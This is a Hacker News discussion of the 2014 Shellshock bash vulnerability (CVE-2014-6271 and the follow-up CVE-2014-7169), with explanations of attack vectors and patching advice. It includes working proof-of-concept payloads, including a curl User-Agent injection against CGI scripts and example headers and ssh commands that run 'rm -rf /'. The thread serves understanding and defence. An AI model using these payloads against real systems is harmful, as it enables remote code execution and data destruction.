Hacker News new | comments | show | ask | jobs | submit login
CVE-2014-6271: Remote code execution through bash (seclists.org)
905 points by vault_ on Sept 24, 2014 | hide | past | web | favorite | 416 comments

There's some misunderstanding of how the one-liner works, so here's a writeup.

You can break the one-liner into two lines to see what is happening.

    1. hobbes@media:~$ export badvar='() { :;}; echo vulnerable'
    2. hobbes@media:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
    3. bash: warning: badvar: ignoring function definition attempt
    4. bash: error importing function definition for `badvar'
    5. I am an innocent sub process in 4.3.25(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash spots the specially formed variable (named badvar), prints a warning,

4. ...and apparently doesn't define the function at all?

5. But other than that, the child bash runs as expected.

And now the same two input lines on and OLD bash:

    1. hobbes@metal:~$ export badvar='() { :;}; echo vulnerable'
    2. hobbes@metal:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
    3. vulnerable
    4. I am an innocent sub process in 4.3.22(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash accidentally EXECUTES a snippet that was inside the variable named 'badvar'?!

4. But other than that, the child bash runs as expected. Wow, I should update that machine. :)

I finally understand how it can be used.

I'm sorry; perhaps I'm slow. I see the problem, but how can a stranger set an environment variable?

Lots of internet facing software fills env vars with user data: Apache may set several SSL_* vars and HTTP_* vars, ssh may set LC_*, LANG, TERM, etc; procmail and other smtp filters probably have their fair share too.

The moment any child process of these hit a system() or popen() like call, /bin/sh initializes and may hit the bug.

So it's a sort of injection attack that targets inputs to bash that manage to bypass normal sanitisation?

Apache takes SSL_* headers, say, from a client and simply passes those to BASH and this exploit means that BASH will execute a payload dropped in to the header?Am I close? Wouldn't that also be an Apache [httpd] bug in that it's allowing unsanitised user data to hit the shell?

Similarly are you saying that if I set a LANG variable and SSH to a server that the server will use that variable to give to BASH, even if it's not a recognised LANG variable?

Perhaps I'm misunderstanding as such things would be massive holes any way regardless of this BASH issue.

From the example code at the top of the thread it seems that you only need to affect a single variable, that bash reads, in order to pwn the whole server.

Interestingly on Ubuntu the BASH update for this is rated "medium".

It's kind of the equivalent of a web app that basically evals any given GET parameter with a specially crafted value.

Apache sets environment variables, it does not pass user input directly to bash as code or anything like that. The fact that bash can be tricked to execute this code is a problem that needs to be addressed by bash, not any other software.

>"Apache sets environment variables, it does not pass user input directly to bash as code or anything like that." //

This is contrary to how I'm understanding the situation. BASH, or whichever shell is being used, sets environment variables; Apache httpd et al. pass off some user data (from clients, eg browser headers) to the shell to set variables under limited circumstances [like use of CGI], no? Then when BASH gets initialised something is happening in the parsing of variables causing statements included with the variable (which variable can be a function definition) to be executed.

I realise now that as things stand you can't sanitise many of the fields [like http client headers] as they don't have well defined forms. But setting variables for use by BASH seems as close to "pass user input directly to bash" as you're going to get.

Mainly I'm doubting that all these different apps duplicate code to set env variables when the shell already knows how to do it, doesn't seem very *nixy. Happy to be corrected as I'm - as I'm sure you've guessed - a bit out of my depth.

Sorry for the late reply - you can think of environment variables as basically HTTP headers for bash scripts. They are one way to pass user input to a bash script. While you want bash to make those environment variables available to the bash script, you don't really want any code in their value to be executed (unless, of course, your script does that on purpose).

httpd with CGI does not alter your bash script by prepending a set of variable assignments (which, of course, would be a very bad idea) - it simply sets values that are then passed to bash. The bash parser then can be tricked into executing code in those environment variables.

In a webserver, like Apache, environment variables are set from headers sent by the client, e.g. each header like Cookie would produce variable like HTTP_COOKIE. These variables can contain any data that the user sent. If Apache uses external code (like PHP, Ruby, Python, etc.) to process the request, it may pass these variables to that code, and if that code runs some command on the system, these variables may be passed to the command shell, which would lead to code contained in the variable to be executed at that point.

This can also happen with other service processes - such as OpenSSH, that sets ORIG_SSH_COMMAND variable to the command that the user supplies. That may allow people to break out of restricted accounts -i.e. accounts that are supposed to run just one command (ssh-based services, like SVN or Git, may be an example) and run arbitrary commands under such user.

>OpenSSH, that sets ORIG_SSH_COMMAND variable to the command that the user supplies //

So they set shell vars without sanitising them first?

As an analogy, suppose I go to a website written in PHP and register with the username "Robert'); DROP TABLE Students;--". A correct PHP script will sanitize the name; it'll escape the quote and run something like `update users set name='Robert\'); DROP TABLE Students;--'`. If mysql then ignores the backslash and drops the Students table, that is definitely a mysql problem and not a PHP problem. Doing any more on the PHP side to "sanitize" the name would actually break the script by screwing up valid names.

In this case, the shell variables are correctly sanitized by Apache or whatever, and then mishandled by bash. For example, imagine this very simple system:

- Web server receives a GET request with the user's name. - Web server sets the environment variable USERS_NAME='<whatever was submitted with quotes escaped>'. - Web server sends back the result of running `bash print_welcome_message.sh`.

It might not be considered great design, but there's nothing inherently insecure in this system, and there are plenty of actual systems that more or less work this way. And it's also perfectly valid for a user to have the name `() { :;}; echo vulnerable`. It ought to work fine to set USERS_NAME to that value and send back `Welcome, () { :;}; echo vulnerable.`

Instead, an unpatched bash will execute the contents of USERS_NAME. The only way for the web server to prevent that would be to change the user's name, which would be wrong behavior -- given a properly working shell, it would print the wrong name in the response. The web server does its sanitization job correctly when it successfully sets USERS_NAME in spite of any single quotes or what-have-you -- this part isn't its problem.

Ahh, Little Bobby Tables.



CGI scripts is the most obvious way - when executing a CGI script, each HTTP header gets translated into an environment variable - but I have no doubt there's all sorts of odd network-facing apps which set environment various and then run a command, even if you're not running CGI scripts.

Surely though the CGI framework sanitises the headers first? Otherwise this seems like it's a pretty predictable problem - isn't "always sanitise user data" the cardinal rule of backends.

I can certainly imagine that I might have designed a web page that passed user input direct to a BASH script to do a ping or some such, but not if it's public facing.

What sanitization do you expect the CGI framework to apply to the header value representing the user agent? str_replace($userAgent, '() {', 'no bash bug for you')?

Only a few environment variables are given any meaning by the system. Other environment variables don't have any predefined meaning and can be any null-terminated string.

Indeed, lol. It's a bit clearer to me now. Thanks for your comment.

It seems like a sort of loose typing issue. Perhaps if when setting environment variables the app using them could specify a type (eg nonExecutableText) such that bash knows it's receiving textual content that mustn't be executed; would that help?

One of the comments in this thread (http://seclists.org/oss-sec/2014/q3/650 ), seems to indicate that Apache is an attack vector for this vulnerability.

Here is a simple c program to demonstrate this.


#include <stdlib.h>

int main()


   setenv("VAR", "() { :;}; echo vulnerable", 0);





That's awesome.

Does system() invoke /bin/sh? Does it look for 'sh' on the path? What are the rules?

There are a lot of scripts the do something like: curl 'http://myradframework.com/script.sh' | bash

That'd be pretty easy to do this if they weren't honest or man in the middle attack the site.

That's not really the risk with this vulnerability. Piping a web-sourced script to bash has always been a vulnerability, but it's one that you choose to live with when you do it.

The reason this is newsworthy is because there are some network-facing programs (CGI-based web servers, some SSH configurations) that will set the value of some environment variables to a user-supplied value, which bash will then be executed by bash when that program spawns a new process.

That will run arbitrary code regardless

If you are responsible for the security of any system, this is your immediate, drop-everything priority. The technical details of the exploit mean that new ways of exploiting it will be discovered soon. Precedent suggests that automated systematic attacks against every server on the Internet will be coming, on a time scale of hours.

So, as a amateur sysadmin of a decently popular side project, what should I do? I've read over the post on the mailing list, and I think I understand the basic attack, but I'm having trouble understanding exactly how an attacker could run bash on my server and what I therefore need to patch (though I suspect that's intentional). Is `sudo apt-get update && sudo apt-get upgrade` sufficient on an Ubuntu server?

If you just want to upgrade bash, and prevent services like nginx, fpm, and apache from being restarted in production, you can run `sudo apt-get update && sudo apt-get install --only-upgrade bash`

Related to that, does anyone else know if upgrading bash will require a restart of other services kind of like upgrading openssl requires restarting things?

It runs out that these suggestions were premature, the patch released earlier today DOES NOT fix the problem. https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c24

I just tested this on Ubuntu 14.04 - it's vulnerable.

Upgrades should not require any restarts, and no restarts are required for you to stop being vulnerable - as this only affects newly created bash sessions, not already running ones.

Debian's package manager has the nasty habit of stopping affected daemons before all the upgrades and starting them afterwards, leaving you with serious downtime.

> Related to that, does anyone else know if upgrading bash will require a restart of other services kind of like upgrading openssl requires restarting things?

I don't think it will, for a couple of reasons. OpenSSL is integrated into other services as a library, while bash would be called as an external application. I also noticed that once I upgraded bash, the proof of concept stopped working in a terminal I opened prior to the upgrade.

> I also noticed that once I upgraded bash, the proof of concept stopped working in a terminal I opened prior to the upgrade.

[citation needed] because that doesn't sound possible.

Not if the issued commands spawned a new copy of Bash.

> Is `sudo apt-get update && sudo apt-get upgrade` sufficient on an Ubuntu server?

Yes. Patch is out.

It appears that Linode changes /etc/apt/sources.list to point to their own mirror of Ubuntu repositories, and as far as I can tell those are not updated yet. So I guess the solution is to wait or edit sources.list. Just FYI if you're on their systems!

Just did an update on my Linode and one of the updates was

    replace bash 4.1-2ubuntu3
So seems like it's there now.

https://launchpad.net/ubuntu/+source/bash/4.3-7ubuntu1.1 seems to be at least one version of the fix, I'm unsure about LTS and other releases.


Ubuntu 14.04 LTS: bash 4.3-7ubuntu1.1

Ubuntu 12.04 LTS: bash 4.2-2ubuntu2.2

Ubuntu 10.04 LTS: bash 4.1-2ubuntu3.1

For releases in-between, you should be able to manually download one of those versions from http://archive.ubuntu.com/ubuntu/pool/main/b/bash/ and install it. I wonder how many vulnerable boxes there are that won't get these updates because Ubuntu stops support after 9 months. There must be tons of boxes running 13.10, it's not even a year old yet.

It's for that reason that I just ignore anything that's not an LTS release. It's never worth the hassle for me.

For 13.10 do this, selecting correct architecture:



wget archive.ubuntu.com/ubuntu/pool/main/b/bash/bash_4.2-2ubuntu2.3_amd64.deb

sudo dpkg -i bash_4.2-2ubuntu2.3_amd64.deb



wget archive.ubuntu.com/ubuntu/pool/main/b/bash/bash_4.2-2ubuntu2.3_i386.deb

sudo dpkg -i bash_4.2-2ubuntu2.3_i386.deb

Depends on whether you have mirrors.linode.com or the ubuntu servers set up in sources.list. I had to swap mine out.

Well, I didn't even know about mirrors.linode.com. Mine were still the ubuntu default servers.

I guess apt-get from one of Linode's mirrors saves bandwidth? Or is it just more polite?

It probably ensures that you get the Linode-customized flavors of packages where such exist, so that, for example, you don't inadvertently upgrade your kernel to a build without the ability to mount Linode disks.

Linode can't modify packages; they're signed by the upstream distro. (Unless Linode added a key of their own to your apt keychain (apt-key list), but I've never seen that.)

It's also meant to help you and Linlde save bandwidth!

Or just manually install the new version with dpkg.

If you just want to update that package then:

apt-get update

apt-get install --only-upgrade bash

fwiw, Linode's mirrors are up with the latest version yet Digital Ocean's are not. I lose faith in DO everytime I remote into my VM. They just seen like an amateurish shop.

My droplets in SFO have been updated. My droplets in nyc1 and nyc2 haven't.

And NY is updated for me as well now. Wondering why it took so long after the other DCs were updated.

Checking in 8 hours later - my droplet on nyc1 is still affected.

I successfully upgraded bash on my droplets a couple minutes ago.

Seconded. I've been patched for ~40 minutes on DO.

I am on linode and precise LTS. I did this, and I got no bash update. What am I doing wrong?

edit: and how do I know if I am still vulnerable?

edit2: ok, this is the test

  env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
and apparently I am already patched. So that's good.

dpkg -l | grep bash

WIll tell you which version of bash is installed, for precise you should have bash 4.2-2ubuntu2.2

DigitalOcean uses mirrors too, so you have to change your /etc/apt/sources.list file or wait.

I updated debian on DO like 25 minutes ago and had a crystal-clear bash update there. So I guess they updated their mirrors.

Debian security updates are distributed from security.debian.org, which is separate from the normal Debian mirror network, and Debian discourages the mirroring of security.debian.org because security updates are time sensitive. Hopefully Digital Ocean is not mirroring security.debian.org.

You should also reboot to ensure no running instances of bash are vulnerable.

If I understood this bug correctly, it happens during bash's initialization. If I'm right, already running instances of bash are not vulnerable, and new instances will use the fixed executable, so no reboot would be necessary for this bug.

  $ apt-cache show debian-goodies 
    checkrestart    - Help to find and restart processes which are using old
                      versions of upgraded files (such as libraries)

The vulnerability is in bash startup; any already-running shells should be safe.

Good point.

I don't know if Ubuntu has pushed a patched version of bash, but bash is what you should update. Someone already posted a way to test whether your version is vulnerable.

You might also look into changing the default shell (but beware, scripts with bashisms in them...).

Ubuntu pushed the update around noon


Really? I haven't been able to find any notice of that, and on 14.04 LTS if I run `sudo apt-get install --only-upgrade bash` I'm still vulnerable.

Ah, looks like I needed to run `sudo apt-get update` first.

sudo apt-get update && sudo apt-get upgrade

yeah, it was updated in debian in the morning...

you should update all security updates, reliably, periodically, regardless of HN posts.

you're probably not directly vulnerable for this very vuln, but then again, maybe you are. with enough vulns it gets complex enough to check that its easier to just update with all the security updates..

We just updated our scanner and included this CVE. You can run Detectify to see if your setup is vulnerable. We offer a recurring service that runs continuously and alerts you if you are exposed to new emerging vulnerabilities. This removes some of the complexity of always being on top of security alerts.

sup advertiser

If you're still waiting for mirrors and such to sync, you can install these packages manually on the LTS releases with the snippet here:


Looks like the patched version and the pre-patched version show the same version, or am I being stupid and missing something ?

  ayourtch@mcmini:~/bash-patch$ ls
  bash_4.2-2ubuntu2.2_amd64.deb bash-builtins_4.2-2ubuntu2.2_amd64.deb  t
  ayourtch@mcmini:~/bash-patch$ dpkg -x bash_4.2-2ubuntu2.2_amd64.deb t
  ayourtch@mcmini:~/bash-patch$ diff -c t/bin/bash /bin/bash
  Binary files t/bin/bash and /bin/bash differ
  ayourtch@mcmini:~/bash-patch$ t/bin/bash --version
  GNU bash, version 4.2.25(1)-release (x86_64-pc-linux-gnu)
  Copyright (C) 2011 Free Software Foundation, Inc.
  License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

  This is free software; you are free to change and redistribute it.
  There is NO WARRANTY, to the extent permitted by law.
  ayourtch@mcmini:~/bash-patch$ /bin/bash --version
  GNU bash, version 4.2.25(1)-release (x86_64-pc-linux-gnu)
  Copyright (C) 2011 Free Software Foundation, Inc.
  License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
  This is free software; you are free to change and redistribute it.
  There is NO WARRANTY, to the extent permitted by law.
  ayourtch@mcmini:~/bash-patch$ sha1sum t/bin/bash
  9eeed02173db163b013933eff3b8c6aa3697f67f  t/bin/bash
  ayourtch@mcmini:~/bash-patch$ sha1sum /bin/bash
  3384fadf84146a4d4b6b7f529f615e9947b4ac99  /bin/bash

Only the build/patchset version is incremented in these packages (the -2ubuntu2.2). You can see the package version with dpkg -s bash | grep Version.

Anyone have code that might work on 13.04 please?

It will be once they release a patch, yes


Already out on Ubuntu, I believe?

A good question that so far nobody has answered (as of right now).

"If you are responsible for the security of any system, this is your immediate, drop-everything priority."

Why don't you explain in plain english exactly why you feel this is the case? "Drop-everything" in other words (or even close to that). Give some scenarios. After all anyone who knows a great deal doesn't need that advice the people who need that advice are ones that don't know enough to know what the impact of this is. [1]

Perhaps you could clarify with some examples of why (see child comment "So, as a amateur sysadmin of a decently popular side project") you think this applies to anyone who is "responsible for the security of any system"?

[1] Me for one because I'm not seeing the "Drop everything" priority for any of the systems that I have control over given the way they are configured. That said I'd like to hear more of course.

Any library anywhere in any application you run that calls out to bash that is called by any other library in that application, so long as that application is somehow hooked up to a web server, is potentially an unauthenticated GET request away from code execution; the exploit for this is potentially so simple that attackers can craft a single request, spider the Internet, and collect shells from applications you run that you forgot you even ran, at which point they'll own your whole data center.


Very much so. I wasn't thinking through the library (and library equivalent) implications.

So for example if you don't run web servers that are front facing on the internet (and you trust your (for example) intranet) then does this become an "asap" rather than a "drop everything"?

"is potentially an unauthenticated GET request"

Are you saying that if you don't have a web server that allows "get" requests (only posts) then this exploit is not an issue at all?

The attack surface of this bug may very well be the largest attack surface of any bug in history. Update bash. Just update bash. Everywhere. On everything you have it on. Don't think about whether, just think about how.

(Note I'm not claiming this is the "worst bug ever"... there's stiff competition for that claim. But most of the rest of the "worst bug ever"s I can think of are some point that failed, some particular thing you could do for full root access or something. I can't think of anything else with this sheer staggering surface area.)

No, that is not what tptacek is saying.

Unauthenticated GET requests were just an example of something that can invoke this behavior. If you have any network-enabled service that's capable of spawning a shell, you can have attack vectors open.

Possible vectors include things like DHCP clients, SSH, web servers, etc. Lots of things open shells for reasons you wouldn't intuitively expect. It's very likely that there are many creative vectors for exploitation that will be discovered in the coming hours.

Read "unauthenticated GET request" as "people who can do the very very simplest thing to your webserver will find this."

I'm sure that the people at Home Depot knew for certain that their network was secure right up until the moment they discovered they were hacked.

You can learn by experience, or you can try to leach the wisdom of others.

I like the DHCP attack vector which was mentioned in the RedHat posting. DHCP clients invoke shell scripts.

Just curious, how long can a wireless SSID be?

I ask because I've seen SSIDs with meaningful characters ()<>;? cause trouble with some network managers. I presumed at the time that this was due to the SSID string being passed as an argument to some script.

I've encountered this on my old Android phone and my old Debian laptop. I encountered it often because a friend of mine used to have an emoticon in the SSID for his home router. (Really annoying! I couldn't connect to anything when his router was in range.)

Note: it could very well have been a different problem. I didn't investigate.

Are you saying that if you don't have a web server that allows "get" requests (only posts) then this exploit is not an issue at all?

Usually no. This exploit should be vulnerable to any HTTP method. "unathenticed GETs" are the lowest security level of HTTP calls, so if they can be used as an attack vector, you should pay attention.

Because this allows execution of arbitrary commands from any unsantized environment variable.

Web servers pass information about the HTTP client to CGI scripts using environment variables. A CGI script written in bash would be vulnerable to arbitrary command execution if any HTTP header contained the vulnerable string.

    GET / HTTP/1.0
    User-Agent: () { :; }; rm -rf /
Restricted SSH accounts (like the ones used by GitHub) have a setting to restrict the user to a specific command (e.g. /usr/local/bin/run-git-only --github-user=octocat). The original command is passed in an environment variable SSH_ORIGINAL_COMMAND. If bash is used anywhere along the way (say, if /usr/local/bin/run-git-only --github-user=octocat is a shell script), then this is a problem:

    ssh git@example.com '() { :; }; rm -rf /'
There are surely lots of other ways to get servers to run bash shells with arbitrary environment variables. That's why this is bad.

Edit: as others have pointed out, even non-bash CGI scripts that use a shell to run external processes are vulnerable For example, system("/usr/local/bin/whatever --some-fixed-option") would normally be considered safe since there's no untrusted data in the command-line (although perhaps it would be considered poor design), but it'll run a shell to do the whitespace splitting. If that shell is bash....

Is this also dangerous to common FastCGI-Wrappers? E.g. this is used by Virtualmin:

    export PHPRC
    umask 022
    exec /usr/bin/php5-cgi
At least SCRIPT_FILENAME is user input isn't it? I'm really not sure but like to have some clarity. It should not work because it's likely impossible to have () at the beginning of the SCRIPT_FILENAME? but can someone give some hints? It's common to have bash/sh wrapper script: https://httpd.apache.org/mod_fcgid/mod/mod_fcgid.html#exampl...

IIUC, you're already pwned after the first line of your wrapper script, i.e. #!/bin/bash, as your CGI environment was already set before, and now you're running bash in it (unless FastCGI works differently, not by setting the environment as plain old CGI; I don't know FastCGI, but from a quick glance I think it works similarly)

FastCGI does work differently – it spawns a process which stays open and communicates with it over stdin / stdout – but that doesn't mean that his PHP script doesn't unexpectedly invoke system() somewhere.

This script here is run when the process is spawned and spawns the PHP process that listens to stdin/stdout. Similar scripts exist in most install of mod_fcgid. E.g. PLESK, Virtualmin, other ISP-Panels... It boils down to look at what environment variables are there when bash runs this script or not? Once bash starts and grabs the environment variables the exploit starts.

So considering there are other variables in there that can be manipulated it would be possible to own a large chunk of servers on the Internet. However I'm not sure if there is caveat and I had hoped that someone can help me.

Edit: Looks safe. These variables are not even there. It's just an outdated script.

I'm a relative newcomer to the command line and have been Googling around for what exactly the () {:;} is doing with no luck. Does anyone have a good link or explanation?

() makes a function { is the function body : is an ancient 'command' that does nothing ; is says run the : command } closes the function body.

Got it, thanks!

Who the hell writes CGI scripts in 2014?

There is a reason PHP is to be kept away and not touched with a ten meter stick, it seems to spawn a shell for weird reasons, I dont think python or groovy apps do that. They're safe, unless you somewhere specifically invoke System.getRuntime().run("bash");

PHP never "spawns shell for weird reasons" - it would spawn shell if you ask it to spawn shell. Just as any other language would, if you ask it. Still, many apps may use shell indirectly - e.g. to execute some system function, to call out to some tool, etc. - and those may be vulnerable even if original code was not CGI script. Moreover, you don't have to run specifically bash - any command execution may go through shell, which may be bash, e.g. Runtime.getRuntime().exec() in Java. Thus it may be not very easy to pinpoint all the places where this bug could sneak in.

> groovy apps do that [... if] you somewhere specifically invoke System.getRuntime().run("bash");

That's a one-liner in Groovy, written in the Java style of chained method calls, which is the direct equivalent of spawning a shell in non-JVM languages, so that's not an argument for using Groovy instead of PHP.

"A CGI script written in bash"

You're killin' me here. If you expose a shell script directly to the network, you're exposing a shell and deserve to be pwned.

If bash is invoked at any point in the response cycle you are pwned; not just if you are directly exposing a shell script. How confident are you that this never happens on any computers anywhere on your network ever?

That's ridiculous. You may as well say that every time you put a python script up, you're exposing the entire Python runtime and deserve to get 'pwned'.

The scope of the risk is limited to script that you write, whether bash or Python.

To be fair, with all the various ways how shell scripts (not only in bash) interpolate, evaluate, substitute etc., the typical shell language is much, much harder to keep safe against code injection than say Python (or even PHP). After all, code injection/evaluation is actually what you want in a shell script, half of the time.

It doesn't have a nice catchy name and a logo, though

Fine. Now it's called BashSmash. Are you happy? Go make a logo.

Someone already made on a few hours ago... https://i.imgur.com/ilJbM74.png

That's really ugly and not a real logo.

People are now calling it "Shellshock".

That's nice. I like this song.


That's funny, showing my age, but "Shellshock" immediately brings up a completely different song in my mind: https://www.youtube.com/watch?v=JUhZ30D7tYU

Is it just me, or are the patches "fixing" the vulnerability woefully insufficient? With the patch, bash stops executing the trailing code, but it still allows defining arbitrary shell functions from environment variables. So, even though the patch fixes the ability to exploit this via SSH_ORIGINAL_COMMAND or HTTP_*, anything that can set environment variables can still override an arbitrary command. (Note that privileged environments typically filter out attempts to set PATH, LD_LIBRARY_PATH, and so on.)

This applies even if your shell script or shell snippet uses the full paths to commands. For instance:

    $ env '/sbin/foo'='() { echo exploit; }' bash -c '/sbin/foo'

Attacker-controlled environment variable names are a rare scenario, and one that probably has you hosed no matter what. Attacker-controlled environment variable values, on the other hand, are not so rare, and if not for this vulnerability they wouldn't be a problem.

More specifically: The environment in general is an attack vector. I mean, it's global input that crosses execution domains! Any name/value pair could potentially mess with any number of programs in unexpected ways. A user should not be able to control any environment changes, period. Of course, whether or not this is practical is an exercise for the sysadmin.

It's not just you. The fact that an environment variable can override e.g. "git" to do something else is a real problem requiring separate protection. However, that's effectively PATH injection rather than code injection so it's already addressed in many cases.

Except that most environments already filter out attempts to control PATH, LD_LIBRARY_PATH, and similar; they don't filter out "git".

I agree. In the next few months, we'll probably be finding out about some of the cases where neither existing sanitization nor the half-fix for this problem was sufficient to prevent exploits in this family. :(

I might be misunderstanding this, but this can be accomplished through http request headers?

It would be a malformed http header and most libraries would ignore it or raise an error.

The vulnerability was released, what, a few hours ago? With a major vulnerability, waiting around for a "proper" fix is probably not a good idea. Get in a hot-patch to minimize the damage, then work on a "proper" fix...

It might still be an issue. The patches may not have done enough.

$ env X='() { (a)=>\' sh -c "echo date"; cat echo


env X='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :("

Can anyone confirm that this is still a security issue?

My reading of this is that it's weird, and it's certainly a bug in the parser, but because you don't get to put the executable code in the environment variable it's not an RCE exploit like the last bug was.

Does anyone have confirmation that this new bug allows you to RCE with control of the value of an environment variable alone?

As best I can tell no one has (publicly) demonstrated a mechanism to turn this into an RCE (despite efforts to do so).


Of course, that doesn't mean there isn't one. It's clearly a reasonably significant issue - the setting of environment variables can cause unintended file system writes (and the same parsing bug can be used for reads) - and you're better off assuming that someone will determine an exploit based on it.

That was my initial reaction too, but I'm not so sure now that the bash maintainer has responded. I'm trying to get a better PoC working.

edit: OK, I give. I don't understand how this is different from,

    env z='' echo oops
So, assuming you have Stupid Server 2.0, and SS 2.0 allows you to send an Accept: header with,

    '' evil command here
...you still need to find a way to execute that command, which is different from CVE-2014-6271, which caused function embedded in environment variables to be executed when they were read.

Am I missing something?

Am I missing something?

I think so, but the sample exploit isn't really designed to give a clear understanding if you don't already know what's going on.

Try this:

  $ export X="() { (a)=>\\"
  $ bash -c 'echo date'
  bash: X: line 1: syntax error near unexpected token `='
  bash: X: line 1: `'
  bash: error importing function definition for `X'
  $ cat echo
  Thu Sep 25 02:27:07 UTC 2014
Setting "X" in that way confuses the bash env variable parser. It barfs at the "=" and leaves the ">\" unparsed

AFAICT (without digging deep into the code) that leave in the execution buffer as ">\[NEWLINE]echo date" which gets treated the same as

  date > echo

Oh that's neat.

The same trick can be used to read files as well

  $ date -u > file1
  $ env -i X='() { (a)=<\' bash -c 'file1 cat'
  bash: X: line 1: syntax error near unexpected token `='
  bash: X: line 1: `'
  bash: error importing function definition for `X'
  Thu Sep 25 02:14:30 UTC 2014 
Though obviously it's going to be trickier to find an system that issues commands in a way that can act as a path for that sort of exploit.

Chet (bash maintainer) says he has a fix.


That's good news

Just tested on Ubuntu 14.04 patched.

"still vulnerable :("

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

From https://securityblog.redhat.com/2014/09/24/bash-specially-cr...

Oh damn:

curl -H 'User-Agent: () { :;}; echo; echo vulnerable to CVE-2014-6271' <shell script CGI URL>

Tested and working against a shell script CGI.

Whoa. I tried this, ran pacaur -Suy and .. it's patched.

Arch was fast.

If you're on Arch, you might want to think about using dash as your /usr/bin/sh after updating, see [0].

[0] https://wiki.archlinux.org/index.php/Dash

Also make sure your mirror is up to date. When I updated this morning, osuosl was out of date (and still is as of this comment: https://www.archlinux.org/mirrors/osuosl.org/125/)

    $ x='() { :;}; echo vulnerable' bash -c 'echo test'
    $ pacman -Syu
    $ x='() { :;}; echo vulnerable' bash -c 'echo test'
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
Benefits of using an OS with a real package manager.

Just don't turn it off after you've ran `pacman -Syu`, it will never boot again ;)

I know you're just teasing, but I've got a machine with an arch install from over two years ago that's still running great. Just did an -Syyu to get bash updated.

The trick is to keep up with the updates, do pacman -Syu every two weeks or so, and not wait months.

After it happened 5 times in a row, I finally just aliased pacman -Syu to "breakX".

I learned today that some mirrors update their package database a lot faster than others. Had to switch mirrors to get the new bash.


It's fixed in Debian as well.

only in wheezy (security) right now.

squeeze. jessie and wheezy are still vulnerable.


squeeze is not supported anymore but you can use squeeze-lts.

It's been uploaded to squeeze-lts but has not reached the mirrors.

You can get it manually from http://incoming.debian.org/debian-buildd/pool/main/b/bash/ if you can't wait.

I've got a Debian VM I maintain for giggles, and just out of masochism I've been running "apt-get update" and "apt-get upgrade" for a while and watching nothing change.. Am I doing something wrong or is the whole process just slow?

    deb http://http.debian.net/debian/ squeeze-lts main contrib non-free
    deb-src http://http.debian.net/debian/ squeeze-lts main contrib non-free

You probably have:

    APT::Default-Release "squeeze";
In a configuration somewhere. Check /etc/apt and the various files in the subdirectories of that.

If you have that line remove it or change it to squeeze-lts

I am not so sure. Debian sid (i386) with current updates, the example test shows I am still vulnerable. 4.3-9 bash

I ran

    env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
and got

    this is a test
so I did

    apt-get update
    apt-get install bash
and now I get

    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test
bash version 4.2.37(1)-release

Edited: Seems like jvreeland has a clearer picture: https://news.ycombinator.com/item?id=8362309

Yeah, I was current yesterday and I'm current today, with both apt-get update and upgrades. Your version number is lower than mine, you must be on either stable or testing.

ii bash 4.3-9 i386 GNU Bourne Again SHell

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

vulnerable this is a test

From the FAQ:

> Does sid have security updates?

Not in the same sense that stable does. If the maintainer of a package fixes a security bug and uploads the package, it'll go into sid by the normal means. If the maintainer doesn't do that, then it won't. The security team only covers stable (and possibly testing... there's a pending issue for that case).

sid/unstable had a fix uploaded ~3 hrs ago fwiw (after you made your comment).

Only for amd64 though, ctrl+f for "4.3-9.1": http://ftp.debian.org/debian/pool/main/b/bash/

Yep. A current i386 debian is still vulnerable, some hours later. Curses.

Edit: I see that even those who got the patch are in fact still vulnerable.


Still vulnerable.

env X='() { (lol)=>\' bash -c "echo id"; cat echo

This is what happens when you have two different processes doing IPC using a human interface mechanism.

Another huge family of vulnerabilities that exists for the same reason are SQL injection vulnerabilities. SQL was invented as a way for humans at a terminal to do database operations. However, we started using it as a way of doing IPC. The problem with using human interfaces as an IPC mechanism is that human interfaces are rarely well-defined or minimal, so it is very hard to constrain behavior to what you expect.

The way to fix all of these bugs is to use well-defined, computer-oriented IPC mechanisms where there is a clear distinction between code and data. For example, database queries might be constructed by function call instead of string manipulation, which could pack them into a safe TLV format with no chance of malicious query injection. Generating web server content from a different language could be done via a proper FFI or message passing mechanism, rather than CGI scripts.

Here's how to patch Ubuntu 8.04 or anything where you have to build bash from source:

  #assume that your sources are in /src
  cd /src
  wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
  #download all patches
  for i in $(seq -f "%03g" 0 25); do wget     http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done
  tar zxvf bash-4.3.tar.gz 
  cd bash-4.3
  #apply all patches
  for i in $(seq -f "%03g" 0 25);do patch -p0 < ../bash43-$i; done
  #build and install
  ./configure && make && make install

Not sure if Ubuntu 8.04 with custom built bash will be upgradable to 10.04??

Or you could just download a bash-static deb from 10.04 (https://launchpad.net/ubuntu/lucid/+package/bash-static) and overwrite /bin/bash. It shouldn't cause any issues when upgrading, though you could back up the original.

8.04 is unsupported, and situations like this justify the effort of upgrading it to the latest LTS.

Enter this PoC in your terminal:

env var='() {(a)=>\' bash -c "echo date"; cat echo

A target patched for CVE-2014-6271 will output the date upon executing that PoC (Proof of Concept):

bash: var: line 1: syntax error near unexpected token `='

bash: var: line 1: `'

bash: error importing function definition for `var'

Thu Sep 25 17:52:32 EDT 2014

There is a new update (#26) for bash 4.3 which fixes CVE-2014-7169 (the old bash update was still flawed/incomplete as demonstrated above by executing the PoC). So, taking into account what everyone before contributed, the new complete patch code would be:

mkdir src

cd src

wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz

#download all patches

for i in $(seq -f "%03g" 0 26); do wget http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done

tar zxvf bash-4.3.tar.gz

